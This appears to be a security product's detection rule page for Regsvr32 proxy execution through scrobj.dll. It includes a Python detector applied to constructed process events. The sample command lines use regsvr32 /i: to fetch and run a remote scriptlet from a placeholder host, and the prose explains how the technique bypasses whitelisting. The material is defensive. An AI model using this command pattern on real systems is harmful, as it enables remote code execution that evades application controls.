Regsvr32 exploitation
Rule added on 30th May, 2024
Rule type:
Correlation
Rule description:
Regsvr32 (regsvr32.exe) is a Windows command line tool used by administrators to register and unregister Dynamic Link Library (DLL) and Object Linking & Embedding (OLE) control files, which writes the corresponding COM server entries to the Windows registry.
Attackers often abuse regsvr32.exe to execute malicious scripts or load DLLs into memory, because it is a signed Microsoft binary that is typically permitted by application control (whitelisting) policies, so its execution may not trigger security tools.
Attack chain scenario: Phishing -> Regsvr32-based payload execution -> Data breach
Impact:
It can be used by adversaries in the following ways:
- Persistence
- Data breach
- Loss of data integrity
Data source:
Windows > Process Creation
Required configuration: The rule is based on process creation and termination events. Prerequisites are installing and configuring Sysmon (Event ID 1), enabling the "Audit Process Creation" audit policy subcategory (Event ID 4688), and enabling the "Include command line in process creation events" policy so that command line arguments are logged.
Relevant MITRE ATT&CK techniques and tactics:
Tactic: TA0005 - Defense Evasion
Technique: T1218 - System Binary Proxy Execution
Sub Technique: T1218.010 - Regsvr32
Criteria:
( ( Command Line contains "regsvr32" ) AND ( Command Line contains "scrobj.dll" ) )
Attackers may use regsvr32.exe to execute malicious scripts and payloads.
scrobj.dll - It is the legitimate Windows Script Component runtime DLL. Attackers do not need to replace it: passing scrobj.dll to regsvr32.exe together with the /i: switch (for example, /s /n /u /i:<scriptlet path or URL> scrobj.dll) causes the DLL to load the referenced scriptlet (.sct) file and execute the script inside it, optionally fetched from a remote server, while the process on disk remains a trusted Microsoft binary. This is why the rule keys on both strings appearing in the same command line.
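The criteria above applied to a few constructed process creation records, as an added example that is not part of the original rule page. It implements the two-substring match case-insensitively (Windows paths and switches are case-insensitive, so a case-sensitive check is trivially bypassed by writing ScrObj.dll), and it also pulls the /i: argument out of the command line so the alert carries the scriptlet location and whether it is remote. The events, paths and hostnames are made up for illustration; the field names follow the Sysmon Event ID 1 layout but any process creation source with a command line field works.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcessEvent:
    """Minimal view of a process-creation event (Sysmon Event ID 1 / Security 4688)."""
    image: str
    command_line: str
    parent_image: str


# Constructed sample events (not real telemetry); values are illustrative only.
SAMPLE_EVENTS = [
    # Proxy execution of a remote scriptlet through scrobj.dll
    ProcessEvent(
        image=r"C:\Windows\System32\regsvr32.exe",
        command_line=r"regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll",
        parent_image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    ),
    # Same technique, mixed case and a local scriptlet path
    ProcessEvent(
        image=r"C:\Windows\SysWOW64\RegSvr32.exe",
        command_line=r"RegSvr32.EXE /S /U /I:C:\Users\Public\update.sct ScrObj.dll",
        parent_image=r"C:\Windows\System32\cmd.exe",
    ),
    # Benign: an installer registering its own COM server, no scrobj.dll involved
    ProcessEvent(
        image=r"C:\Windows\System32\regsvr32.exe",
        command_line=r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
        parent_image=r"C:\Windows\System32\msiexec.exe",
    ),
    # Unrelated process that mentions neither string
    ProcessEvent(
        image=r"C:\Windows\System32\notepad.exe",
        command_line=r"notepad.exe C:\Users\alice\notes.txt",
        parent_image=r"C:\Windows\explorer.exe",
    ),
]


def rule_matches(event: ProcessEvent) -> bool:
    """The rule's criteria: command line contains both "regsvr32" and "scrobj.dll".

    Lower-casing first makes the check case-insensitive; otherwise an attacker
    can dodge the rule simply by typing ScrObj.dll or RegSvr32.
    """
    cl = event.command_line.lower()
    return "regsvr32" in cl and "scrobj.dll" in cl


# /i:<value> is the scriptlet (local path or URL) that scrobj.dll loads and executes.
# Windows accepts either "/" or "-" as the switch prefix.
_SCRIPTLET_ARG = re.compile(r'(?i)[/-]i:\s*("[^"]+"|\S+)')
_SILENT_SWITCH = re.compile(r"(?i)(^|\s)[/-]s(\s|$)")


def scriptlet_source(command_line: str) -> Optional[str]:
    """Return the value passed with /i: (the scriptlet location), or None if absent."""
    m = _SCRIPTLET_ARG.search(command_line)
    return m.group(1).strip('"') if m else None


def triage(event: ProcessEvent) -> dict:
    """Enrich a hit with the fields an analyst wants on the alert."""
    src = scriptlet_source(event.command_line)
    return {
        "command_line": event.command_line,
        "parent": event.parent_image,
        "scriptlet": src,
        # /s suppresses the registration dialog box, so the user sees nothing
        "silent": bool(_SILENT_SWITCH.search(event.command_line)),
        "remote_scriptlet": (src or "").lower().startswith(("http://", "https://")),
    }


def run_rule(events) -> list:
    """Apply the correlation criteria to a batch of events and return enriched hits."""
    return [triage(e) for e in events if rule_matches(e)]


if __name__ == "__main__":
    for hit in run_rule(SAMPLE_EVENTS):
        print(hit)
```

Only the first two events match; the benign vendor registration does not because scrobj.dll never appears in its command line. The extracted scriptlet field is what separates a true positive from the false positive described later on this page: a legitimate registration of scrobj.dll has no /i: argument, whereas the attack pattern always supplies one, and a URL there is a strong indicator of a remote payload.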
When to enable this rule:
Security standards (NIST CSF 2.0):
Enabling this rule will help you meet the security standards' requirements listed below:
DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events
When this rule is triggered, you are notified that regsvr32.exe has been used for the proxy execution of potentially malicious code.
This enables you to monitor the use of system binaries such as regsvr32.exe that can proxy the execution of other code.
Known false positives: Some music management or media software may use regsvr32.exe to register the legitimate scrobj.dll for its own operations. Such registrations normally carry no /i: argument; a command line that passes a scriptlet path or URL with /i: should be treated as suspicious even if the parent process looks legitimate.
Next steps:
When this alert is triggered, the following measures can be implemented:
- Identification: Identify if the alert is a new incident or part of an existing incident.
- Analysis: Analyze the impact and extent of the compromise to comprehend the severity of the attack.
- Response: Respond promptly by initiating an automated workflow to terminate the malicious process and, where a remote scriptlet was referenced, block the source URL.
- Least privilege principle: Ensure that the use of regsvr32.exe is limited to authorized users only.